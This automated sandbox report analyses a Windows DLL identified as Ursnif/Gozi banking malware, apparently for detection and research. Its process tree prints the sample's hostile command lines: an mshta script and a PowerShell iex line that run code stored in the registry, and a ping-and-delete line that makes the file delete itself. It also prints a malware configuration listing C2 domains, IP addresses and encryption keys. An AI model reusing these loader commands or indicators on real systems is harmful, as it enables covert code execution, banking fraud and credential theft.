Edit tour
Windows
Analysis Report
tIJVb0BvkI.dll
Overview
General Information
| Sample Name: | tIJVb0BvkI.dll |
| Analysis ID: | 620333 |
| MD5: | f28f39ada498d66c378fd59227e0f215 |
| SHA1: | 1c9c0584ad51f5be3f16b334d758c88b8cdb7b38 |
| SHA256: | 0a66e8376fc6d9283e500c6e774dc0a109656fd457a0ce7dbf40419bc8d50936 |
| Tags: | dllgeoGoziISFBITAUrsnif |
| Infos: |  |
 | |
Detection
Ursnif
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
loaddll32.exe (PID: 6904 cmdline: loaddll32. exe "C:\Us ers\user\D esktop\tIJ Vb0BvkI.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) 
cmd.exe (PID: 6984 cmdline: cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\tIJ Vb0BvkI.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) 
rundll32.exe (PID: 7020 cmdline: rundll32.e xe "C:\Use rs\user\De sktop\tIJV b0BvkI.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) 
control.exe (PID: 4324 cmdline: C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - explorer.exe (PID: 684 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 5832 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\tIJVb0Bv kI.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 2464 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 3808 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
mshta.exe (PID: 6756 cmdline: C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Kmli='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Kmli).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) 
powershell.exe (PID: 3300 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name smls iwoq -valu e gp; new- alias -nam e dbmfrylm pa -value iex; dbmfr ylmpa ([Sy stem.Text. Encoding]: :ASCII.Get String((sm lsiwoq "HK CU:Softwar e\AppDataL ow\Softwar e\Microsof t\54E80703 -A337-A6B8 -CDC8-873A 517CAB0E") .UrlsRetur n)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 4204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 5612 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\2tb3qiq 3\2tb3qiq3 .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 5896 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES109F.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\2tb 3qiq3\CSCC A338523CEA 149558ADCB DE2BD495CF E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 3368 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\5xaibb0 3\5xaibb03 .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 4168 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES37BE.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\5xa ibb03\CSC5 E69315C691 F4C1A85D8D AF9C7145CE 8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| Click to see the 21 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| Click to see the 4 entries | ||||
⊘No Sigma rule has matched
| Timestamp: | 05/04/22-16:27:52.293372 05/04/22-16:27:52.293372 |
| SID: | 2033203 |
| Source Port: | 49738 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
| Timestamp: | 05/04/22-16:28:12.405919 05/04/22-16:28:12.405919 |
| SID: | 2033203 |
| Source Port: | 49758 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
| Timestamp: | 05/04/22-16:28:12.829578 05/04/22-16:28:12.829578 |
| SID: | 2033204 |
| Source Port: | 49758 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Code function: | 3_2_01065FBB | |
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
Networking | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | Snort IDS: | ||
| Source: | Snort IDS: | ||
| Source: | Snort IDS: | ||
| Source: | Snort IDS: | ||
| Source: | Process created: | ||
| Source: | ASN Name: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Code function: | 3_2_01061CA5 | |
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
Key, Mouse, Clipboard, Microphone and Screen Capturing | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
E-Banking Fraud | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Registry key value created / modified: | Jump to behavior | ||
| Source: | Code function: | 3_2_01065FBB | |
System Summary | |
|---|
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | Static PE information: | ||
| Source: | Code function: | 3_2_01064BF1 | |
| Source: | Code function: | 3_2_01061645 | |
| Source: | Code function: | 3_2_0106829C | |
| Source: | Code function: | 3_2_0106190C | |
| Source: | Code function: | 3_2_01066D0A | |
| Source: | Code function: | 3_2_01064321 | |
| Source: | Code function: | 3_2_010684C1 | |
| Source: | Binary or memory string: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | ReversingLabs: | ||
| Source: | Static PE information: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Classification label: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Code function: | 3_2_010668BD | |
| Source: | Process created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 3_2_0106829B | |
| Source: | Code function: | 3_2_01067EA9 | |
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
Hooking and other Techniques for Hiding and Protection | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Registry key monitored for changes: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion | |
|---|
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Evasive API call chain: | ||
| Source: | Last function: | ||
| Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
| Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Check user administrative privileges: | ||
| Source: | Process information queried: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Process queried: | Jump to behavior | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory protected: | Jump to behavior | ||
| Source: | Memory protected: | Jump to behavior | ||
| Source: | Memory protected: | Jump to behavior | ||
| Source: | Memory protected: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Thread register set: | Jump to behavior | ||
| Source: | Thread register set: | Jump to behavior | ||
| Source: | Thread created: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Code function: | 3_2_01063365 | |
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Code function: | 3_2_01064B89 | |
| Source: | Code function: | 3_2_01066D78 | |
| Source: | Code function: | 3_2_01063365 | |
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
Remote Access Functionality | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 Windows Management Instrumentation | Path Interception | 812 Process Injection | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
| Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 Masquerading | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 31 Virtualization/Sandbox Evasion | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 812 Process Injection | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
